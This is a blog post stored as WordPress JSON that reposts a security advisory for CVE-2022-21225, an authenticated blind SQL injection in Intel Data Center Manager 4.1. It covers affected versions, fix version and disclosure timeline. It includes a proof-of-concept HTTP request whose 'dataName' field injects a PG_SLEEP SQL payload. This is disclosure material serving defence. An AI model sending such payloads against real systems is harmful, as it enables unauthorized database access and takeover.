{"id":34565,"date":"2022-12-09T19:08:10","date_gmt":"2022-12-09T16:08:10","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170180\/idcm41-sql.txt"},"modified":"2022-12-11T10:19:32","modified_gmt":"2022-12-11T06:49:32","slug":"intel-data-center-manager-4-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/intel-data-center-manager-4-1-sql-injection\/","title":{"rendered":"Intel Data Center Manager 4.1 SQL Injection"},"content":{"rendered":"<p>RCE Security Advisory<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"XecamJ3Rq0\"><p><a href=\"https:\/\/www.rcesecurity.com\/\" target=\"_blank\" rel=\"noopener\">Home<\/a><\/p><\/blockquote>\n<p>1. ADVISORY INFORMATION<br \/>\n=======================<br \/>\nProduct: Intel Data Center Manager<br \/>\nVendor URL: https:\/\/www.intel.com\/content\/www\/us\/en\/developer\/tools\/data-center-manager-console\/overview.html<br \/>\nType: SQL Injection [CWE-89]<br \/>\nDate found: 2022-01-21<br \/>\nDate published: 2022-12-01<br \/>\nCVSSv3 Score: 9.9 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H)<br \/>\nCVE: CVE-2022-21225<\/p>\n<p>2. CREDITS<br \/>\n==========<br \/>\nThis vulnerability was discovered and researched by Julien Ahrens from<br \/>\nRCE Security.<\/p>\n<p>3. VERSIONS AFFECTED<br \/>\n====================<br \/>\nIntel Data Center Manager 4.1 and below<\/p>\n<p>4. INTRODUCTION<br \/>\n===============<br \/>\nEnergy costs are the fastest rising expense for today\u2019s data centers. 
Intel\u00ae Data<br \/>\nCenter Manager (Intel\u00ae DCM) provides real-time power and thermal consumption data,<br \/>\ngiving you the clarity you need to lower power usage, increase rack density, and<br \/>\nprolong operation during outages.<\/p>\n<p>(from the vendor&#8217;s homepage)<\/p>\n<p>5. VULNERABILITY DETAILS<br \/>\n========================<br \/>\nIntel DCM&#8217;s endpoint at &#8220;\/DcmConsole\/DataAccessServlet?action=getRoomRackData&#8221; is<br \/>\nvulnerable to an authenticated, blind SQL Injection when user-supplied input to<br \/>\nthe HTTP POST parameter &#8220;dataName&#8221; is processed by the web application.<\/p>\n<p>Since the application does not properly validate and sanitize this parameter, an<br \/>\nattacker can inject arbitrary SQL commands against the PostgreSQL backend<br \/>\ndatabase server of the web application.<\/p>\n<p>Successful exploits can allow an authenticated attacker (the lowest possible<br \/>\nauthorization level &#8220;Guest&#8221; is sufficient) to read and modify database contents<br \/>\nand execute any system commands on the underlying operating system. This way,<br \/>\nthe attacker can compromise the system&#8217;s entire confidentiality, integrity, and<br \/>\navailability.<\/p>\n<p>6. PROOF OF CONCEPT<br \/>\n===================<br \/>\nPOST \/DcmConsole\/DataAccessServlet?action=getRoomRackData HTTP\/1.1<br \/>\nHost: [ip-address]<br \/>\nCookie: JSESSIONID=[session-id]<br \/>\nContent-Length: 153<br \/>\nAccept: application\/json, text\/plain, *\/*<br \/>\nContent-Type: text\/plain<br \/>\nUser-Agent: Mozilla\/5.0<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8<br \/>\nConnection: close<\/p>\n<p>{&quot;antiCSRFId&quot;:&quot;[your-anti-csrf-id]&quot;,&quot;requestObj&quot;:{&quot;snapshotId&quot;:1,&quot;roomId&quot;:1,&quot;dataName&quot;:&quot;test&#39;);SELECT PG_SLEEP(5)--&quot;}}<\/p>\n<p>(see the referenced blog post for more details)<\/p>\n<p>7. 
SOLUTION<br \/>\n===========<br \/>\nUpdate at least to version 5.0.0.46307.<\/p>\n<p>8. REPORT TIMELINE<br \/>\n==================<br \/>\n2022-01-21: Discovery of the vulnerability<br \/>\n2022-01-21: Reported to vendor via their bug bounty program<br \/>\n2022-01-21: Vendor response: Sent to &#8220;appropriate reviewers&#8221;<br \/>\n2022-02-08: Vendor acknowledges the vulnerability with a severity of &#8220;medium&#8221; without sharing their CVSS calculation<br \/>\n2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.8<br \/>\n2022-02-16: I don&#8217;t accept the rating because the vendor downplayed it<br \/>\n2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1\/AV:A\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H)<br \/>\n2022-02-25: Apparently AV:A is still wrong, but I don&#8217;t have more energy to fight them. However this advisory contains the proper CVSS rating.<br \/>\n2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix<br \/>\n2022-08-09: Vendor releases advisory INTEL-SA-00662<br \/>\n2022-12-01: Public disclosure<\/p>\n<p>9. 
REFERENCES<br \/>\n==============<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"BbbykvzgRy\"><p><a href=\"https:\/\/www.rcesecurity.com\/2022\/12\/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225\/\" target=\"_blank\" rel=\"noopener\">From Zero to Hero Part 2: From SQL Injection to RCE on Intel DCM (CVE-2022-21225)<\/a><\/p><\/blockquote>\n<p>https:\/\/www.intel.com\/content\/www\/us\/en\/security-center\/advisory\/intel-sa-00662.html<br \/>\nhttps:\/\/github.com\/MrTuxracer\/advisories<\/p>\n","protected":false},"excerpt":{"rendered":"<p>RCE Security Advisory Home 1. ADVISORY INFORMATION ======================= Product: Intel Data Center Manager Vendor URL: https:\/\/www.intel.com\/content\/www\/us\/en\/developer\/tools\/data-center-manager-console\/overview.html Type: SQL Injection [CWE-89] Date found: 2022-01-21 Date published: 2022-12-01 CVSSv3 Score: 9.9 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H) CVE: CVE-2022-21225 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. 
VERSIONS AFFECTED ==================== Intel Data Center Manager &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34565","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34565","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34565"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34565\/revisions"}],"predecessor-version":[{"id":34718,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34565\/revisions\/34718"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}